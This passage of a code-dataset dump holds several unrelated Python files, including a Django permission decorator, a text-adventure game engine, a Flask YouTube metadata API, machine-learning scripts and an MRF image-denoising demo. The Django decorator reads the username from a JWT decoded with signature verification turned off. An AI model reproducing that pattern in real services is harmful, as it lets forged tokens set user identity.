校验虚拟机的管理操作权限\n * input None\n * output 是否有权限 1 有权限 0 没有权限\n \"\"\"\n try:\n handler = EMDBHandler(token)\n user_perms = handler.get_permission()\n if user_perms['is_super']:\n return 1\n permission = user_perms['permission']\n if 'kvm-option' in permission:\n return 1\n return 0\n except:\n raise Exception('权限校验失败')\n\n\ndef return_json_api():\n \"\"\"\n * desc 返回json的装饰器\n * input func\n * output json内容\n \"\"\"\n def wraps(f):\n def de_ex(request, *args, **kwargs):\n try:\n # 获取token 并解析 设置用户名\n token = request.COOKIES.get('jwttoken', '')\n if not token:\n token = request.META.get('HTTP_TOKEN', '')\n if token:\n # 如果有token的话进行权限校验\n if not check_vir_permission(token):\n raise Exception('没有权限')\n # 设置用户信息\n try:\n decode_info = jwt.decode(token, verify=False)\n setattr(request, 'user_name', decode_info['username'])\n except:\n setattr(request, 'user_name', 'anonymous')\n else:\n # 没有token的时候直接报错\n raise Exception('请先进行登录操作')\n setattr(request, 'user_name', 'anonymous')\n data = f(request, *args, **kwargs)\n message = \"\"\n status = 0\n if isinstance(data, dict):\n 
if \"message\" in data:\n message = data[\"message\"]\n if \"status\" in data and 'status_name' not in data:\n status = data[\"status\"]\n # 错误信息的时候的返回\n data = data.get(\"data\", {})\n result = {\"status\": status, \"message\": message, \"data\": data}\n return HttpResponse(json.dumps(result), content_type=\"application/json\")\n except Exception as ex:\n logging.error(str(ex))\n data = {\"status\": 1, \"message\": str(ex), \"data\": []}\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n return de_ex\n return wraps\n\n\ndef return_file_api():\n \"\"\"\n * desc 返回file的装饰器\n * input func\n * output 文件下载\n \"\"\"\n def wraps(f):\n def de_ex(request, *args, **kwargs):\n try:\n return f(request, *args, **kwargs)\n except Exception as ex:\n logging.error(str(ex))\n data = {\"status\": 1, \"message\": str(ex), \"data\": []}\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n return de_ex\n return wraps\n\n\ndef query_params(request):\n \"\"\"\n * desc 获取get和post的请求内容\n * input request\n * output get post的参数\n \"\"\"\n data = {}\n for key in request.GET.keys():\n data[key] = request.GET[key]\n for key in request.POST.keys():\n data[key] = request.POST[key]\n if request.body:\n try:\n info = json.loads(request.body.decode('utf8'))\n except:\n info = {}\n data.update(info)\n logger.info(\"request data is %s\" % data)\n return data\n\n\ndef query_get_params(request):\n \"\"\"\n * desc 获取get的请求内容\n * input request\n * output get的参数\n \"\"\"\n data = {}\n for key in request.GET.keys():\n data[key] = request.GET[key]\n return data\n\n\ndef query_post_params(request):\n \"\"\"\n * desc 获取post的请求内容\n * input request\n * output post的参数\n \"\"\"\n data = {}\n for key in request.POST.keys():\n data[key] = request.POST[key]\n return data\n","sub_path":"python/vir_manager/utils/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"561359025","text":"from json2html import *\nimport json\n\njsonFile = ''\nhtmlFile = ''\n\njsonFile = input(\"Enter Json File:\")\nhtmlFile = input(\"Enter HTML Output File Name:\")\n\nwith open(jsonFile, 'r') as jf_obj:\n lines = json.load(jf_obj)\n with open(htmlFile, 'a') as hf_obj:\n hf_obj.write(json2html.convert(json = lines))\n\n","sub_path":"For Linux/jsontoHTML.py","file_name":"jsontoHTML.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397832857","text":"import json\nfrom debug import *\nfrom accessor import *\nfrom actions import ActionManager\nimport programs\nimport time\nimport image_manager\nimport file_manager\nfrom subprocess import call\nimport display\nimport scenes\nimport sys\nimport random\nrandom.seed()\n\n\"\"\"\n--------------------------\n World\n--------------------------\nContains all the places in the world, all npcs, and the player. Is basically a container.\nCan manipulate npcs and player to move around the world.\n\"\"\"\nclass World:\n def __init__(self):\n\n self.running = True\n\n # initial load world data\n world_data = get_json('world_builder')\n \n # gameobjects\n self.gameobjects = GameObject.load(world_data['gameobjects'])\n self.computers = Computer.load(world_data['computers'])\n \n # locations\n self.locations = Location.load(world_data['locations'])\n \n # player\n self.player = Player.load(world_data['player'])\n \n self.time = Time.load(world_data['time'])\n \n # load npc's and their dialogues\n self.npcs = NPC.load(world_data['npcs'], all_dialogues())\n\n # load initial actions data\n self.action_manager = ActionManager.load(all_actions())\n\n self.worldstate = \"normal\"\n\n def update(self):\n self.player.talking = \"\"\n self.player.running = \"\"\n self.player.using = \"\"\n\n if self.time.now == \"day\":\n pass\n elif self.time.now == \"night\":\n pass\n\n if self.worldstate == \"lose\":\n scenes.lose()\n self.running = False\n elif self.worldstate == \"win\":\n scenes.end()\n # done! game is removed from saves since its finished\n finish_current_game()\n quit()\n\n def get_gameobject(self,name):\n if name in self.gameobjects:\n return self.gameobjects[name]\n return False\n\n def get_computer(self,name):\n if name in self.computers:\n return self.computers[name]\n return False\n\n def get_npc(self,name):\n if name in self.npcs:\n return self.npcs[name]\n return False\n\n def get_location(self,name):\n if name in self.locations:\n return self.locations[name]\n return False\n\n def save_gameobject(self, go):\n if go.name in self.gameobjects:\n self.gameobjects[go.name] = go\n return True\n return False\n\n def save_computer(self, comp):\n if comp.name in self.computers:\n self.computers[comp.name] = comp\n return True\n return False\n\n def save_npc(self, npc):\n if npc.name in self.npcs:\n self.npcs[npc.name] = npc\n return True\n return False\n\n def save_location(self, loc):\n if loc.name in self.locations:\n self.locations[loc.name] = loc\n return True\n return False\n\n def is_comp(self, name):\n for c in self.computers:\n if c.name == name:\n return True\n return False\n\n def is_go(self, name):\n for go in self.gameobjects:\n if go.name == name:\n return True\n return False\n\n\n\"\"\"\n--------------------------\n Location\n--------------------------\nPlace in the world. 
In order to do certain actions, the player must be in a location\n\"\"\"\nclass Location:\n def __init__(self, name, desc, connections, gameobjects, computers, day_npcs, night_npcs):\n self.name = name\n self.desc = desc\n self.connections = connections\n self.gameobjects = gameobjects\n self.computers = computers\n self.day_npcs = day_npcs\n self.night_npcs = night_npcs\n\n def load(data):\n locations = {}\n for k,v in data.items():\n locations[k] = Location(\n k,\n v['desc'],\n v['connections'],\n v['gameobjects'],\n v['computers'],\n v['day_npcs'],\n v['night_npcs']\n )\n return locations\n\n def get_connections(self):\n w = get_world()\n cs = []\n for c in self.connections:\n cs.append(w.get_location(c))\n return cs\n\n def get_connection(self, con):\n if con in self.connections:\n return get_world().get_location(con)\n return False\n\n def get_gameobjects(self):\n w = get_world()\n gos = []\n for g in self.gameobjects:\n gos.append(w.get_gameobject(g))\n return gos\n\n def get_gameobject(self, go):\n if go in self.gameobjects:\n return get_world().get_gameobject(go)\n for g in self.get_gameobjects():\n if g.opened and go in g.specials['contents']:\n return get_world().get_gameobject(go)\n return False\n\n def remove_gameobject(self, go):\n r = None\n if go in self.gameobjects:\n self.gameobjects.remove(go)\n else:\n r = self.remove_from_container(go)\n return r\n\n def get_container(self, go):\n g = None\n for n in self.gameobjects:\n g = get_world().get_gameobject(n)\n if 'contents' in g.specials and go in g.specials['contents']:\n return n\n return False\n\n def remove_from_container(self, go):\n w = get_world()\n name = self.get_container(go)\n cont = w.get_gameobject(name)\n if 'contents' in cont.specials and go in cont.specials['contents']:\n w.gameobjects[name].specials['contents'].remove(go)\n save_world(w)\n return False\n\n def add_gameobject(self, go):\n if go not in self.gameobjects:\n self.gameobjects.append(go)\n return True\n return False\n\n def get_npcs(self):\n w = get_world()\n npcs = []\n it = []\n if w.time.now == \"day\":\n it = self.day_npcs\n elif w.time.now == \"night\":\n it = self.night_npcs\n\n for n in it:\n npcs.append(w.get_npc(n))\n\n return npcs\n\n def get_npc(self, name):\n if name in self.day_npcs or name in self.night_npcs:\n return get_world().get_npc(name)\n return False\n\n def get_computers(self):\n w = get_world()\n comps = []\n for c in self.computers:\n comps.append(w.get_computer(c))\n return comps\n\n def get_computer(self, name):\n if name in self.computers:\n return get_world().get_computer(name)\n return False\n\n # def move_npc(self, name, loc):\n # w = get_world()\n # loc = get_location(loc)\n # if loc:\n # self.npcs.remove(name)\n # loc.npcs.append(name)\n # w.save_location(loc)\n # w.save_location(self)\n # save_world(w)\n # return True\n # return False\n\n\"\"\"\n--------------------------\n GameObject\n--------------------------\nGameObjects are objects in the world that the player can interact with.\nIf a GameObject is picked up, then it is considered an \"item\".\nGameObjects affect what actions are available to the player.\n\"\"\"\nclass GameObject:\n def __init__(self, name, desc, attrs, specials):\n self.name = name\n self.desc = desc\n self.attrs = attrs\n self.specials = specials\n self.opened = False\n\n def load(data):\n gameobjects = {}\n for k,v in data.items():\n attributes = []\n specials = {}\n\n if 'attributes' in data[k]:\n attributes = data[k]['attributes']\n if 'specials' in data[k]:\n specials = data[k]['specials']\n\n 
gameobjects[k] = GameObject(\n k,\n data[k]['desc'],\n attributes,\n specials\n )\n return gameobjects\n\n\"\"\"\n--------------------------\n Computer\n--------------------------\nThe main tool object of the game. You can access a computer like you would access a gameobject. Once you access a computer,\nyou can type commands into it, and it will return outputs, including text and images.\n\"\"\"\nclass Computer(GameObject):\n def __init__(self, name, owner, desc, can_pick_up, data):\n super().__init__(name, desc, [], {})\n if can_pick_up:\n self.attrs.append(\"can_pick_up\")\n self.owner = owner\n self.data = data\n\n def load(data):\n computers = {}\n for k,v in data.items():\n computers[k] = Computer(\n k,\n data[k]['owner'],\n data[k]['desc'],\n data[k]['can_pick_up'],\n computer_files(k)\n )\n return computers\n\n def get_owner(self):\n w = get_world()\n if self.owner == w.player.name:\n return w.player\n else:\n o = w.get_npc(self.owner)\n if o:\n return o\n return False\n\n def relative_path(self,target,raw):\n if not raw:\n if target:\n return get_world().player.computer_location + [target]\n return get_world().player.computer_location\n return target\n\n def add_file(self,path,name,contents,raw=False):\n path = self.relative_path(path,raw)\n directory = self.get_directory(path)\n if directory:\n directory[name] = contents\n return True\n return False\n\n def get_directory(self,path,raw=False):\n path = self.relative_path(path,raw)\n data = self.data\n if len(path) > 0:\n for e in path:\n if e in data:\n data = data[e]\n else:\n return False\n return data\n\n def ls(self,path,raw=False):\n directory = self.get_directory(path)\n for e in directory:\n if isinstance(directory[e],dict):\n e = str(e) + \"/\"\n print(\" \",e)\n\n # target = w.player.computer_location\n # target.append(inpt[1])\n def cd(self,path,raw=False):\n w = get_world()\n path = self.relative_path(path,raw)\n\n # can't cd into files\n if len(path) > 0 and len(path[-1].split(\".\")) > 1 and path[-1] != \"..\":\n return False\n \n data = self.data\n\n for e in path:\n if e in data:\n data = data[e]\n else:\n if e == \"..\":\n if len(path) > 2:\n self.cd(path[:-2],raw=True)\n return True\n elif len(path) == 2:\n self.cd([],raw=True)\n return True\n return False\n\n w.player.computer_location = path\n save_world(w)\n return True\n\n def open(self,path,raw=False):\n if not \".\" in path:\n return False\n \n if self.get_directory(path):\n tp = path.split(\".\")[1]\n if tp == None:\n return False\n elif tp == \"png\":\n image_manager.open_image(path)\n elif tp == \"txt\" or tp == \"email\":\n file_manager.open_text(path)\n else:\n return False\n return True\n return False\n\n def run(self, path):\n if self.get_directory(path):\n tp = path.split(\".\")[1]\n if tp == None:\n return False\n else:\n suc = programs.run(self.name, path)\n return suc\n return False\n\n def prompt_password(self):\n i = input(\"enter password: \")\n return i == get_password(self.name)\n\n # NOTE: this definition overrides the add_file defined above\n def add_file(self,path,filename):\n p = self.data\n for i in path:\n p = p[i]\n p[filename] = filename\n\n\"\"\"\n--------------------------\n Player\n--------------------------\nStores all the information about the Player.\nReputation is how highly regarded you are at work.\n - If goes below 0, fired\n - Every 20 increments is a difference in position\n (promotion at 20, 40, 60, 80, etc)\nReputation also affects how other people interact with you.\n\"\"\"\nclass Player:\n def __init__(self, name, mode, computer, computer_location, location, inventory, devices, reputation):\n 
self.name = name\n self.mode = mode\n self.computer = computer\n self.computer_location = computer_location\n self.location = location\n self.inventory = inventory\n self.devices = devices\n self.reputation = reputation\n self.actions = []\n self.talking = None\n self.running = None\n self.using = None\n self.solved_computers = []\n\n def load(data):\n return Player(\n data['name'],\n data['mode'],\n data['computer'],\n data['computer_location'],\n data['location'],\n data['inventory'],\n data['devices'],\n data['reputation'],\n )\n\n def init_laptop(self):\n w = get_world()\n \n c = w.get_computer('laptop')\n c.owner = self.name\n w.save_computer(c)\n\n c = w.get_computer('phone')\n c.owner = self.name\n w.save_computer(c)\n\n save_world(w)\n\n def get_computer(self):\n return get_world().get_computer(self.computer)\n\n def get_current_directory(self):\n if self.computer:\n path = self.computer_location\n directory = False\n return self.get_computer().get_directory(self.computer_location)\n return False\n\n def get_location(self):\n return get_world().get_location(self.location)\n\n def get_inventory(self):\n w = get_world()\n inv = []\n for i in self.inventory:\n inv.append(w.get_gameobject(i))\n return inv\n\n def get_gameobject(self, name):\n if name in self.inventory:\n return get_world().get_gameobject(name)\n return False\n\n def get_devices(self):\n w = get_world()\n ds = []\n for d in self.devices:\n ds.append(w.get_computer(d))\n return ds\n\n def get_device(self, name):\n if name in self.devices:\n return get_world().get_computer(name)\n return False\n\n def enter_computer(self, name):\n w = get_world()\n if name in w.computers:\n self.computer = name\n self.mode = \"comp\"\n self.computer_location = []\n if not name in self.solved_computers:\n self.solved_computers.append(name)\n return self\n else:\n return False\n\n def give_item(self, i):\n if isinstance(i, GameObject):\n i = i.name\n elif isinstance(i, list):\n for j in i:\n self.give_item(j)\n return\n\n if i not in self.inventory:\n self.inventory.append(i)\n\n def complete_action(self, action):\n if not isinstance(action, str):\n action = action.name\n\n if action not in self.actions:\n self.actions.append(action)\n\n def has_items(self, itemlist):\n for i in itemlist:\n if not i in self.inventory:\n return False\n return True\n\n def has_devices(self, devicelist):\n for i in devicelist:\n if not i in self.devices:\n return False\n return True\n\n\"\"\"\n--------------------------\n NPC\n--------------------------\nNPCs are characters in the game that will interact with you in typical ways.\nNPCs will take into account your \nHowever, some NPCs will do special things and be required for certain tasks.\n\"\"\"\nclass NPC:\n def __init__(self, name, desc, dialogue):\n self.name = name\n self.desc = desc\n self.location = None\n self.dialogue = dialogue\n\n def load(data, dialogue_data):\n npcs = {}\n for k,v in data.items():\n npcs[k] = NPC(\n k,\n data[k]['desc'],\n dialogue_data[k]\n )\n return npcs\n\n def activate_dialogue(self):\n w = get_world()\n dia = \"\"\n\n if w.time.now == \"night\":\n print()\n slow_print(\"(\" + self.name + \") ...zzzzzz...\")\n print()\n return True\n\n if 'reputation' in self.dialogue:\n for r in self.dialogue['reputation']:\n if w.player.reputation >= r[0]:\n dia = random.choice(r[1])\n \n elif 'time' in self.dialogue:\n for r in self.dialogue['time']:\n if w.time.now == r[0]:\n dia = random.choice(r[1])\n \n elif 'inventory' in self.dialogue:\n for r in self.dialogue['inventory']:\n if 
w.player.has_items(r[0]):\n dia = random.choice(r[1])\n\n elif 'device' in self.dialogue:\n for r in self.dialogue['device']:\n if w.player.has_devices(r[0]):\n dia = random.choice(r[1])\n \n elif 'worldstate' in self.dialogue:\n for r in self.dialogue['worldstate']:\n if w.worldstate == r[0]:\n dia = random.choice(r[1])\n \n if dia == \"\":\n dia = random.choice(self.dialogue['default'])\n\n if \"player\" in dia:\n dia = dia.replace(\"player\",w.player.name)\n\n print()\n slow_print(\"(\" + self.name + \") \" + str(dia))\n print()\n\n w.player.talking = self.name\n save_world(w)\n\n return w\n\n\"\"\"\n--------------------------\n Time\n--------------------------\nTime object that stores the current time in the world and has some useful methods\n\"\"\"\nclass Time:\n def __init__(self, now):\n self.now = now\n self.possible_times = [\"day\", \"night\"]\n\n def load(data):\n return Time(data['now'])\n\n def set_time(self, t):\n if t in self.possible_times:\n self.now = t\n return True\n else:\n return False\n\n\"\"\"\n--------------------------\n Utilities\n--------------------------\n\"\"\"\n\ndef fast_print(text):\n sys.stdout.write(str(text))\n sys.stdout.flush()\n\ndef slow_print(text,dt=0.0075,br=True):\n for i in list(text):\n time.sleep(dt)\n fast_print(i)\n time.sleep(dt)\n if br:\n lb()\n\ndef lb():\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()","sub_path":"beta versions/src/beta1.3/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":18493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"122727972","text":"from pytube import YouTube\nimport time\nfrom flask import Flask, render_template, url_for, request\nfrom flask_cors import CORS\nfrom hurry.filesize import size\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/api/youtube')\ndef youtube():\n url = request.args.get('url')\n if url:\n yt = YouTube(url)\n video = {\n \"info\": {\n \"title\": yt.title,\n \"author\": yt.author,\n \"thumbnail\": yt.thumbnail_url,\n \"description\": yt.description,\n \"length\": time.strftime(\"%H:%M:%S\", time.gmtime(yt.length)),\n \"views\": yt.views,\n \"publish_date\": yt.publish_date,\n \"chanel\": yt.channel_url,\n \"raiting\": yt.rating,\n \"publish_date\": yt.publish_date,\n \"js_url\": yt.js_url\n },\n \"sources\": []\n }\n videos = yt.streams.filter(progressive=True)\n for v in videos:\n video['sources'].append({\n \"url\": v.url,\n \"size\":size(v.filesize),\n \"resolution\": v.resolution\n })\n return video\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"291653438","text":"# $ python3 exercise_E.py -train SM.csv\n\nimport argparse\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import Lasso\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom exercise_C import RDKit_2D_descriptors\nfrom exercise_D import calc_lnka\n\nimport optuna\n \ndef objective(trial):\n \"\"\"\n search hyper parameter based on RMSE value (5-fold CV)\n \"\"\"\t\n\n\t# Lagrange multiplier (determine weight parameter of Regularization term)\n alpha = trial.suggest_loguniform('alpha', 1e-2, 1.5)\n # the number of iteration\n max_iter = trial.suggest_int('max_iter', 1000, 100000)\n # tolerance for optimization\n tol = trial.suggest_loguniform('tol', 1e-6, 1e-4)\n\n reg = Lasso(alpha=alpha,\n max_iter=max_iter,\n tol=tol,)\n \n rmse_list = cross_val_score(reg, X, y, scoring='neg_root_mean_squared_error', cv=5, n_jobs=-1)\n # convert neg_rmse value to positive \n return - np.array(rmse_list).mean()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"construct regression model from Small molecule data\")\n parser.add_argument(\"-train\", help=\"path to train csv data\")\n args = parser.parse_args()\n if args.train is None:\n print(parser.print_help())\n exit(1)\n\n ##### 1. data preparation #####\n\n # read .csv\n df = pd.read_csv(args.train)\n \n # make explanatory variable\n smiles = df['SMILES'].values\n # apply compute_2D_desc to each molecule\n X = np.array([RDKit_2D_descriptors(mol).compute_2D_desc() for mol in smiles])\n\n # make response variable\n # apply calc_lnka to each PPB\n y = df['PPB (fb)'].apply(calc_lnka).values\n\n # Standardization of explanatory variables\n sc = StandardScaler()\n X = sc.fit_transform(X)\n\n ##### 2. search hyper parameter using optuna #####\n study = optuna.create_study()\n study.optimize(objective, n_trials=100)\n print('Lasso Regression : Best Parameters')\n for key, value in study.best_params.items():\n \tprint(f'{key} = {value},')\n print('==================================================')\n\n\n ##### 3. output best parameters' result #####\n reg = Lasso(**study.best_params)\n # 5-fold cross validation \n kf = KFold(n_splits=5, shuffle=True, random_state=0)\n # store each RMSE value and R value\n RMSE = []\n R = []\n for tr_index, val_index in tqdm(kf.split(X, y)):\n \t# split train data and validation data\n \tX_tr, X_val = X[tr_index], X[val_index]\n \ty_tr, y_val = y[tr_index], y[val_index]\n \treg.fit(X_tr, y_tr)\n \t# validate regressor\n \ty_pr = reg.predict(X_val)\n \t# root-MSE\n \tRMSE.append(np.sqrt(mean_squared_error(y_val, y_pr)))\n \t# not diagonal element of variance-covariance matrix\n \tR.append(np.corrcoef(y_val, y_pr)[0,1])\n print('RMSE (ln(K_a))')\n print(RMSE)\n print('R (ln(K_a))')\n print(R)\n","sub_path":"exercise_E.py","file_name":"exercise_E.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"163274973","text":"from skimage import restoration # skimage's restoration submodule.\n\nplane_bilateral = restoration.denoise_bilateral(plane_rescaled)\nplane_tv_chambolle = restoration.denoise_tv_chambolle(plane_rescaled)\n\n# Checking the results.\n_, (win_left, win_center, win_right) = plt.subplots(nrows=1, ncols=3, figsize=(12, 8))\n\nsc.show_plane(win_left, plane_rescaled, title='Original')\nsc.show_plane(win_center, plane_bilateral, title='Bilateral')\nsc.show_plane(win_right, plane_tv_chambolle, title='TV Chambolle')\n","sub_path":"content/solutions/01_solutions02_restoration.py","file_name":"01_solutions02_restoration.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"583889997","text":"import requests\nfrom bs4 import BeautifulSoup\n\n#This functions will extract the token's time from the canary tokens web page\n\ndef timeLocator(x): #define function that returns the time from \n\n page_link = x\n page_response = requests.get(page_link, timeout=5)\n page_content = BeautifulSoup(page_response.content, \"html.parser\")\n most_recent_tokens = page_content.find(class_=\"details-header\", recursive=True)\n tokenString = str(most_recent_tokens)\n latest_token_date = tokenString[40:60]\n \n return(latest_token_date)\n","sub_path":"webscrapper.py","file_name":"webscrapper.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"78346449","text":"import re\nimport jieba\nfrom gensim.models import word2vec\nfrom TextCNN_code_ensemble.data_utils import seg_words, create_dict, get_labal_weight,\\\n shuffle_padding, sentence_word_to_index, get_vector_tfidf, BatchManager, get_max_len,\\\n get_weights_for_current_batch, compute_confuse_matrix\nfrom TextCNN_code_ensemble.utils import load_data_from_csv, get_tfidf_and_save, load_tfidf_dict,\\\n load_word_embedding\n\n\ntrain_data_path = \"../data/sentiment_analysis_trainingset.csv\"\ndev_data_path = \"../data/sentiment_analysis_validationset.csv\"\npath_word2vec_word_string = \"data/word2vec_word_string.txt\" # 用于训练word的word2vec的语料库\n\n\ndef get_word_data():\n train_data_df = load_data_from_csv(train_data_path)\n validate_data_df = load_data_from_csv(dev_data_path)\n content_train = train_data_df.iloc[:, 1]\n content_valid = validate_data_df.iloc[:, 1]\n string_train = seg_words(content_train, \"word\")\n string_train = \" \".join(string_train)\n string_valid = seg_words(content_valid, \"word\")\n string_valid = \" \".join(string_valid)\n string = string_train + \" \" + string_valid\n with open(path_word2vec_word_string, \"w\", encoding=\"utf-8\") as f:\n f.write(string)\n\n\ndef get_word2vec(type):\n if type == \"word\":\n sentences = word2vec.LineSentence(path_word2vec_word_string)\n model = word2vec.Word2Vec(sentences, sg=0, hs=1, min_count=1, window=4, size=100, iter=20) # CBOW\n model.save(\"data/word2vec_word_model\")\n model.wv.save_word2vec_format('data/word2vec_word_model.txt', binary=False)\n else:\n pass\n # sentences = word2vec.LineSentence(path_word2vec_char_string)\n # model = word2vec.Word2Vec(sentences, sg=0, hs=1, min_count=1, window=4, size=100, iter=20) # CBOW\n # model.save(\"data/word2vec_char_model\")\n # model.wv.save_word2vec_format('data/word2vec_char_model.txt', binary=False)\n\n\nif __name__ == \"__main__\":\n get_word_data()\n get_word2vec(\"word\")\n","sub_path":"TextCNN_code_ensemble/get_word2vec.py","file_name":"get_word2vec.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"286129752","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom collections import defaultdict\n\nimport numpy as np\nnp.random.seed(1)\nimport networkx as nx\n\nclass MRF(object):\n\n def __init__(self, input, theta=0.3, threshold=0.1):\n # 入力画像\n self.input = input\n # 入力画像のサイズ\n self.shape = self.input.shape\n\n # ノイズを含む観測値\n self.visible = nx.grid_2d_graph(self.shape[0], self.shape[1])\n\n # ノイズ除去した真の値の推測値 (潜在変数)\n self.hidden = nx.grid_2d_graph(self.shape[0], self.shape[1])\n\n for n in self.nodes():\n # 入力画像の値を 各観測値ノードの 'value' にセット\n self.visible[n]['value'] = self.input[n[0], n[1]]\n\n # 潜在変数が隣接ノードから受け取るメッセージは\n # {ノード座標 : 各値 {0, 1} をとる確率} の辞書として保存\n f = lambda: np.array([1.0, 1.0])\n self.hidden[n]['messages'] = defaultdict(f)\n\n self.theta = theta\n self.threshold = threshold\n\n def nodes(self):\n # ノードの座標を (行番号, 列番号) の tuple として返す generator\n for r in range(self.shape[0]):\n for c in range(self.shape[1]):\n yield (r, c)\n\n @property\n def denoised(self):\n \"\"\"\n ノイズ除去した画像を返す\n \"\"\"\n # 確率伝播法をループ実行 (Loopy Belief Propagation)\n for p in self.belief_propagation():\n pass\n\n # ノイズ除去後の画像\n denoised = np.copy(self.input)\n for r, c in self.nodes():\n prob = np.array([1.0, 1.0])\n messages = self.hidden[(r, c)]['messages']\n for value in messages.values():\n prob *= value\n # 周辺分布から 潜在変数の推定値を算出\n denoised[r, c] = 0 if prob[0] > prob[1] else 1\n return denoised\n\n def send_message(self, source):\n \"\"\"\n sourceで指定されたノードからから各隣接ノードへ\n メッセージを送信する\n \"\"\"\n targets = [n for n in self.hidden[source] if isinstance(n, tuple)]\n\n # 収束判定のため、前回ループ時のメッセージとの差分をとる\n diff = 0\n for target in targets:\n # source で指定されたノードの周辺分布を求める\n message = self.marginal(source, target)\n message /= np.sum(message)\n messages = self.hidden[target]['messages']\n # 前回ループ時のメッセージとの差分を加算\n diff += np.sum(np.abs(messages[source] - message))\n messages[source] = message\n # 差分の総和を返す\n return diff\n\n def marginal(self, source, target):\n \"\"\"\n source で指定されたノードの周辺確率を求める\n \"\"\"\n m = np.array([0.0, 0.0])\n for i in range(2):\n prob = self.prob(i)\n neighbors = self.hidden[source]['messages'].keys()\n # メッセージ送信先である target ノードは周辺分布の計算から除外する\n for n in [n for n in neighbors if n != target]:\n prob *= self.hidden[source]['messages'][n]\n m[i] = np.sum(prob)\n return m\n\n def belief_propagation(self, loop=20):\n # 収束判定条件\n # ここでは グラフのエッジ数 * threshold で指定された数値とした\n edges = [e for e in self.hidden.edges()]\n edges = [e for e in edges if isinstance(e[0], tuple) and isinstance(e[1], tuple)]\n threshold = self.threshold * len(edges)\n\n for n in self.nodes():\n message = self.prob(self.visible[n]['value'])\n message /= np.sum(message)\n self.hidden[n]['messages'][n] = message\n yield\n\n for i in range(loop):\n diff = 0\n for n in self.nodes():\n diff += self.send_message(n)\n yield\n\n # 収束判定\n if diff < threshold:\n break\n\n def prob(self, value):\n \"\"\"\n 周辺分布を求める\n \"\"\"\n base = np.array([1 + self.theta if value == 0 else 1 - self.theta,\n 1 + self.theta if value == 1 else 1 - self.theta])\n return base\n\n\ndef get_corrupted_input(img, corruption_level):\n \"\"\"\n ノイズを加えた画像を生成\n \"\"\"\n corrupted = np.copy(img)\n inv = np.random.binomial(n=1, p=corruption_level,\n size=img.shape)\n for r in range(img.shape[0]):\n for c in range(img.shape[1]):\n if inv[r, c]:\n corrupted[r, c] = ~(corrupted[r, c].astype(bool))\n return corrupted\n\n# MNIST データをダウンロード / ロード\nfrom sklearn.datasets import fetch_mldata\nmnist = fetch_mldata('MNIST original', data_home=\".\")\n\nimport 
matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfig, axes = plt.subplots(5, 3, figsize=(6, 8))\n\n# slice out sample data\ndata = mnist.data[[0, 7000, 14000, 21000, 28000]]\n\nfor i, (axrow, img) in enumerate(zip(axes, data)):\n img = img.reshape(28, 28)\n # convert to a binary image\n img = (img >= 128).astype(int)\n\n # add 5% noise\n corrupted = get_corrupted_input(img, 0.05)\n # build a Markov random field instance from the noisy image\n mrf = MRF(corrupted)\n\n if i == 0:\n axes[i][0].set_title('Original')\n axes[i][1].set_title('Noisy')\n axes[i][2].set_title('Denoised')\n axes[i][0].imshow(img, cmap=cm.Greys_r)\n axes[i][1].imshow(mrf.input, cmap=cm.Greys_r)\n # the MRF.denoised property returns the denoised estimate\n axes[i][2].imshow(mrf.denoised, cmap=cm.Greys_r)\n for ax in axrow:\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\nplt.show()\n","sub_path":"MRF.py","file_name":"MRF.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"96084417","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSoftWEAR ADC module. Adds MUX features and hardware detection to normal ADC \r\ncapabilities of the underlying mraa library.\r\n\"\"\"\r\n\r\nimport mraa # Main peripheral class. Implements basic ADC \r\nimport RoboMUX as mux # SoftWEAR MUX class. \r\n\r\n# Translation between normal ADC inexes and the ones that mraa uses\r\nidx2mraa = {0:1, 1:2, 2:3, 3:4, 4:5, 5:6, 6:7}\r\n\r\n# Translation between string IDs and normal ADC indexes (to be translated to MRAA)\r\nstr2idx = {'P9_39':0, 'P9_40':1, 'P9_37':2, 'P9_38':3, \r\n 'P9_33':4, 'P9_36':5, 'P9_35':6}\r\n\r\n\r\nclass RoboADC:\r\n def __init__(self):\r\n \"\"\" Class constructor. Initialises the module with the hardware options.\r\n This includes the scan pins and the possible MUX objects.\"\"\"\r\n self._pin_objects = [] # Initialise the mraa pin object list\r\n self._mux_object = mux.RoboMUX() # Create the SoftWEAR Mux object for the ADC\r\n for pin in self.SCAN_PINS: # Go through all configured ADC pins\r\n # Validate the pin and get the mraa index associated with it.\r\n scan_idx, mraa_idx = 